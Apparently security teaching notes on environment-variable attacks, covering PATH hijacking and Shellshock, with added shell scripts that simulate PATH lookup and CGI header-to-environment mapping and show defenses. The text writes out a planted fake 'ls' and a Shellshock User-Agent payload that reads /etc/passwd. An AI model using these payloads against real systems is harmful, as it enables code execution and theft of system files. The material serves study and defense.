Environment Variables

Command execution is affected by environment variables.

  • They do not appear on the command line that is executed; they live in the process context and are inherited by every child process.

In other words: commands read and act on environment variables.

  • Controlling environment variables may give control over a program that reads them.

Examples

The PATH variable holds a colon-separated list of directories that the shell searches, in order, when a command is given without a path.

If PATH="/bin:/sbin:/usr/bin:/usr/sbin", system("ls") runs /bin/sh -c "ls", and the shell looks for an executable named ls in each of those directories in turn, running the first one it finds.

If an attacker controls PATH, they can make the application run a different binary under the same name, for example by putting a directory they can write to in front of the system directories.

host:/sec$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
host:/sec$ ls -al
drwxr-xr-x 1 user user   4096 Nov 5 23:36 .
drwxrwxrwt 1 root root   4096 Nov 5 23:39 ..
-rwxr-xr-x 1 user user 455584 Nov 5 23:36 ls
host:/sec$ export PATH=/sec
host:/sec$ ls -la
Evil code here!
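The following script is an added example, not part of the original page: it writes out the PATH search the way a POSIX shell performs it, shows an attacker-controlled ordering redirecting "ls" to a planted script, and ends with the defense a privileged program should apply (reset PATH to a fixed list, or call binaries by absolute path). The directories and the fake ls are constructed fixtures created under mktemp; nothing outside them is touched. The TRUSTED_PATH value is an assumption chosen to match the transcript above.

```sh
#!/bin/sh
# Added example (not from the original page): PATH search, PATH hijack, defense.

# lookup_in_path PATHLIST NAME: print the first executable NAME found in the
# colon-separated PATHLIST, searching left to right like the shell does.
# Exit status 1 if nothing matches. Runs in a subshell so IFS/set -f do not leak.
lookup_in_path() (
    IFS=:        # split $1 on colons
    set -f       # no globbing while splitting
    for dir in $1; do
        [ -z "$dir" ] && dir=.          # an empty entry means "." (a second trap)
        if [ -f "$dir/$2" ] && [ -x "$dir/$2" ]; then
            printf '%s\n' "$dir/$2"
            exit 0
        fi
    done
    exit 1
)

# plant_fake NAME DIR: drop an attacker's stand-in for NAME into DIR
# (constructed fixture; it only echoes a marker).
plant_fake() {
    printf '#!/bin/sh\necho "Evil code here!"\n' > "$2/$1"
    chmod 755 "$2/$1"
}

# hijack_demo: a trusted dir holding the "real" ls and an attacker dir holding
# the fake; report which one each PATH ordering picks.
hijack_demo() {
    trusted=$(mktemp -d); evil=$(mktemp -d)
    printf '#!/bin/sh\necho "real ls"\n' > "$trusted/ls"; chmod 755 "$trusted/ls"
    plant_fake ls "$evil"
    echo "PATH=$trusted:$evil -> $(lookup_in_path "$trusted:$evil" ls)"
    echo "PATH=$evil:$trusted -> $(lookup_in_path "$evil:$trusted" ls)"
    rm -rf "$trusted" "$evil"
}

# Defense: a privileged program (setuid binary, cron job, service) must not
# trust the inherited PATH. Reset it to a fixed list before running anything,
# or call /bin/ls by absolute path. TRUSTED_PATH is an assumed value here.
TRUSTED_PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
run_with_trusted_path() (
    PATH=$TRUSTED_PATH
    export PATH
    exec "$@"
)

hijack_demo
```

Note that an empty PATH entry (a leading or trailing colon, or "::") is treated as the current directory, which is why a writable working directory is as dangerous as a writable directory explicitly listed in PATH. sudo's secure_path option applies the same reset shown in run_with_trusted_path.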

CVE-2014-6271 - Shellshock

Summary: Bash executes code placed after a function definition that it imports from an environment variable.

env x='() { :;}; echo "Bad code"' bash -c ':'

Will print Bad code: the child bash imports x as a function, and a vulnerable version keeps parsing past the function body and executes the trailing echo (a patched bash instead warns that it is ignoring the function definition attempt).

  • The issue seems innocuous: an attacker who can already run env could run any other command directly.

But... some servers create environment variables from user-supplied content.

CGI: Common Gateway Interface.

  • Simple way of executing scripts that interact with clients through a web server

Operation:

  1. Server receives a request.

  2. Server turns the request into environment variables:

    1. URL parameters (QUERY_STRING)

    2. Request metadata such as the method, the script path and Content-Length/Content-Type (the request body itself is handed to the script on stdin, not through the environment)

    3. ALL HTTP HEADERS! (each one as HTTP_<NAME>, e.g. User-Agent becomes HTTP_USER_AGENT)

  3. Server executes the script.

    1. If bash runs at any point (the script is a bash script, or e.g. a Perl script calls system() on a system where /bin/sh is bash), the imported variables are parsed as function definitions and any code placed after the function body is executed.

  4. Server returns the script's output to the client as the HTTP response body.

    1. The script prints response headers first (e.g. Content-Type), then a blank line, then the body.

User-Agent: () { :;}; echo "passwd: " $(</etc/passwd)

The User-Agent HTTP header becomes the environment variable HTTP_USER_AGENT.

A vulnerable bash imports it as a function definition and then executes the trailing echo, which reads the content of /etc/passwd.

  • The output is sent to the client as the response body.
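The following script is an added example, not code from the original page, covering both the CGI procedure above and the User-Agent attack: it simulates the server side of CGI (turning a raw request into the HTTP_* and QUERY_STRING variables and then handing off to a script with that environment), and probes the local bash for the bug using the standard env test. The request, the script path and the bash CGI script are constructed fixtures; the request uses bare \n line endings instead of the CRLF a real server would see, so no line-ending handling is needed.

```sh
#!/bin/sh
# Added example (not from the original page): the CGI side of Shellshock.

# header_to_env_name NAME: "User-Agent" -> "HTTP_USER_AGENT" (the CGI rule:
# upper-case, dashes to underscores, HTTP_ prefix).
header_to_env_name() {
    printf 'HTTP_%s\n' "$1" | tr 'a-z-' 'A-Z_'
}

# cgi_env_from_request REQUEST: print the VAR=value lines a CGI server would
# set from the request line and headers. The body is not mapped: it goes to
# the script on stdin, only its length and type reach the environment.
cgi_env_from_request() {
    printf '%s\n' "$1" | {
        read -r method target _version
        path=${target%%\?*}
        query=${target#*\?}
        [ "$query" = "$target" ] && query=
        printf 'REQUEST_METHOD=%s\nSCRIPT_NAME=%s\nQUERY_STRING=%s\n' \
            "$method" "$path" "$query"
        while IFS= read -r line && [ -n "$line" ]; do   # blank line ends headers
            name=${line%%:*}
            value=${line#*:}
            value=${value# }                              # drop one leading space
            case $name in
                Content-Length) printf 'CONTENT_LENGTH=%s\n' "$value" ;;
                Content-Type)   printf 'CONTENT_TYPE=%s\n'   "$value" ;;
                *) printf '%s=%s\n' "$(header_to_env_name "$name")" "$value" ;;
            esac
        done
    }
}

# run_cgi REQUEST SCRIPT: export the computed variables and exec the script,
# the hand-off a CGI server performs. Subshell, so nothing leaks to the caller.
run_cgi() (
    envfile=$(mktemp)
    cgi_env_from_request "$1" > "$envfile"
    while IFS= read -r kv; do export "$kv"; done < "$envfile"
    rm -f "$envfile"
    exec "$2"
)

# make_cgi_script FILE: a harmless bash CGI script (constructed fixture).
# A vulnerable bash runs whatever follows "() { :;};" in HTTP_USER_AGENT while
# importing the environment, before the first line of this script executes.
make_cgi_script() {
    cat > "$1" <<'EOF'
#!/usr/bin/env bash
printf 'Content-Type: text/plain\n\n'
printf 'client=%s\n' "$HTTP_USER_AGENT"
EOF
    chmod 755 "$1"
}

# shellshock_probe: "vulnerable" if the local bash executes code placed after
# an imported function definition, "patched" otherwise, "no-bash" if absent.
shellshock_probe() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case $out in
        *vulnerable*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Constructed request carrying the page's User-Agent payload (single quotes
# keep $(</etc/passwd) literal; it is data here, not evaluated by this script).
REQUEST=$(printf 'GET /cgi-bin/status.sh?id=7 HTTP/1.1\nHost: victim.example\nUser-Agent: () { :;}; echo "passwd: " $(</etc/passwd)\n\n')

demo() {
    echo "local bash: $(shellshock_probe)"
    echo "--- environment the server would pass to the script ---"
    cgi_env_from_request "$REQUEST"
    if command -v bash >/dev/null 2>&1; then
        script=$(mktemp)
        make_cgi_script "$script"
        echo "--- CGI output ---"
        run_cgi "$REQUEST" "$script" || echo "(could not run the CGI script)"
        rm -f "$script"
    fi
}
demo
```

On a patched bash the CGI output simply echoes the User-Agent string back and bash prints a warning about ignoring the function definition attempt on stderr; on a vulnerable bash the echo in the header runs first, before the script's own Content-Type line, which is why the classic probes also prefix the payload with extra echo commands to produce a well-formed CGI response.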
